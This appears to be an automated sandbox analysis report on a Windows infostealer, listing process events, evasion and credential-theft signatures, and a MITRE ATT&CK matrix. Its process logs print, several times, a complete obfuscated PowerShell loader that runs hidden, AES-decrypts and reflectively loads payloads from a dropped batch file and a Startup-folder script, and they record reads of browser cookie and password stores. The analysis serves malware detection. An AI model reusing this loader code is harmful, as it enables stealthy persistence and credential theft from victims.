    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: powershell.exe, 00000010.00000002.2280534734.000000000329C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NetEventVmNetworkAdatper.format.ps1xml
    Source: bhv8D61.tmp.14.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
    Source: powershell.exe, 00000010.00000002.2280534734.000000000329C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NetEventVmNetworkAdatper.cdxml
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00404C9D LoadLibraryA,GetProcAddress,17_2_00404C9D

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Maps a DLL or memory area into another process
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.batJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::frombase64string('qipeuvuphljqqvgt9vt5alclluvrxedjm/quwegzhvq='); $aes_var.iv=[system.convert]::frombase64string('k8kfkeffc/hhz69/oy9vnw=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $cxhgh=new-object system.io.memorystream(,$param_var); $xwybh=new-object system.io.memorystream; $oxcuo=new-object system.io.compression.gzipstream($cxhgh, [io.compression.compressionmode]::decompress); $oxcuo.copyto($xwybh); $oxcuo.dispose(); $cxhgh.dispose(); $xwybh.dispose(); $xwybh.toarray();}function execute_function($param_var,$param2_var){ $smwnp=[system.reflection.assembly]::load([byte[]]$param_var); $qqvve=$smwnp.entrypoint; $qqvve.invoke($null, $param2_var);}$orzcj = 'c:\users\user\appdata\roaming\dropped.bat';$host.ui.rawui.windowtitle = $orzcj;$qzlmw=[system.io.file]::readalltext($orzcj).split([environment]::newline);foreach ($hibel in $qzlmw) { if ($hibel.startswith('gxfderxikimqjolowotv')) { $twzns=$hibel.substring(20); break; }}$payloads_var=[string[]]$twzns.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[1].replace('#', '/').replace('@', 'a'))));$payload3_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[2].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::frombase64string('qipeuvuphljqqvgt9vt5alclluvrxedjm/quwegzhvq='); $aes_var.iv=[system.convert]::frombase64string('k8kfkeffc/hhz69/oy9vnw=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $cxhgh=new-object system.io.memorystream(,$param_var); $xwybh=new-object system.io.memorystream; $oxcuo=new-object system.io.compression.gzipstream($cxhgh, [io.compression.compressionmode]::decompress); $oxcuo.copyto($xwybh); $oxcuo.dispose(); $cxhgh.dispose(); $xwybh.dispose(); $xwybh.toarray();}function execute_function($param_var,$param2_var){ $smwnp=[system.reflection.assembly]::load([byte[]]$param_var); $qqvve=$smwnp.entrypoint; $qqvve.invoke($null, $param2_var);}$orzcj = 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sc.cmd';$host.ui.rawui.windowtitle = $orzcj;$qzlmw=[system.io.file]::readalltext($orzcj).split([environment]::newline);foreach ($hibel in $qzlmw) { if ($hibel.startswith('gxfderxikimqjolowotv')) { $twzns=$hibel.substring(20); break; }}$payloads_var=[string[]]$twzns.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[1].replace('#', '/').replace('@', 'a'))));$payload3_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[2].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::frombase64string('qipeuvuphljqqvgt9vt5alclluvrxedjm/quwegzhvq='); $aes_var.iv=[system.convert]::frombase64string('k8kfkeffc/hhz69/oy9vnw=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $cxhgh=new-object system.io.memorystream(,$param_var); $xwybh=new-object system.io.memorystream; $oxcuo=new-object system.io.compression.gzipstream($cxhgh, [io.compression.compressionmode]::decompress); $oxcuo.copyto($xwybh); $oxcuo.dispose(); $cxhgh.dispose(); $xwybh.dispose(); $xwybh.toarray();}function execute_function($param_var,$param2_var){ $smwnp=[system.reflection.assembly]::load([byte[]]$param_var); $qqvve=$smwnp.entrypoint; $qqvve.invoke($null, $param2_var);}$orzcj = 'c:\users\user\appdata\roaming\dropped.bat';$host.ui.rawui.windowtitle = $orzcj;$qzlmw=[system.io.file]::readalltext($orzcj).split([environment]::newline);foreach ($hibel in $qzlmw) { if ($hibel.startswith('gxfderxikimqjolowotv')) { $twzns=$hibel.substring(20); break; }}$payloads_var=[string[]]$twzns.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[1].replace('#', '/').replace('@', 'a'))));$payload3_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[2].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::frombase64string('qipeuvuphljqqvgt9vt5alclluvrxedjm/quwegzhvq='); $aes_var.iv=[system.convert]::frombase64string('k8kfkeffc/hhz69/oy9vnw=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $cxhgh=new-object system.io.memorystream(,$param_var); $xwybh=new-object system.io.memorystream; $oxcuo=new-object system.io.compression.gzipstream($cxhgh, [io.compression.compressionmode]::decompress); $oxcuo.copyto($xwybh); $oxcuo.dispose(); $cxhgh.dispose(); $xwybh.dispose(); $xwybh.toarray();}function execute_function($param_var,$param2_var){ $smwnp=[system.reflection.assembly]::load([byte[]]$param_var); $qqvve=$smwnp.entrypoint; $qqvve.invoke($null, $param2_var);}$orzcj = 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sc.cmd';$host.ui.rawui.windowtitle = $orzcj;$qzlmw=[system.io.file]::readalltext($orzcj).split([environment]::newline);foreach ($hibel in $qzlmw) { if ($hibel.startswith('gxfderxikimqjolowotv')) { $twzns=$hibel.substring(20); break; }}$payloads_var=[string[]]$twzns.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[1].replace('#', '/').replace('@', 'a'))));$payload3_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[2].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,17_2_00407C79
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00406B06 GetVersionExA,17_2_00406B06
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Yara detected WebBrowserPassView password recovery tool
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7072, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information322
    Scripting    		Valid Accounts1
    Native API    		322
    Scripting    		1
    DLL Side-Loading    		2
    Obfuscated Files or Information    		1
    OS Credential Dumping    		1
    Account Discovery    		Remote Services1
    Archive Collected Data    		1
    Ingress Tool Transfer    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Exploitation for Client Execution    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    DLL Side-Loading    		11
    Input Capture    		3
    File and Directory Discovery    		Remote Desktop Protocol1
    Data from Local System    		1
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts212
    Command and Scripting Interpreter    		2
    Registry Run Keys / Startup Folder    		111
    Process Injection    		1
    Masquerading    		Security Account Manager14
    System Information Discovery    		SMB/Windows Admin Shares11
    Input Capture    		1
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell    		Login Hook2
    Registry Run Keys / Startup Folder    		21
    Virtualization/Sandbox Evasion    		NTDS1
    Security Software Discovery    		Distributed Component Object Model2
    Clipboard Data    		2
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Access Token Manipulation    		LSA Secrets2
    Process Discovery    		SSHKeylogging12
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
    Process Injection    		Cached Domain Credentials21
    Virtualization/Sandbox Evasion    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
    Application Window Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
    System Owner/User Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
